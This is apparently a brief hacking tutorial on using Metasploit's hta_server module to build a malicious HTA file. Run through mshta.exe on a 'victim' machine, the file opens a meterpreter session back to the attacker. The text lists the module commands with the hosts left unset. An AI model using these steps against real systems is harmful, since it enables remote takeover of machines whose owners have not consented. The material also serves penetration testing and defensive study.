Hacking with HTA file (MSHTA.exe)

The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.

Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.

Malicious HTA file

Open metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;

  • use exploit/windows/misc/hta_server
  • set srvhost
  • set lhost
  • exploit

Now run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.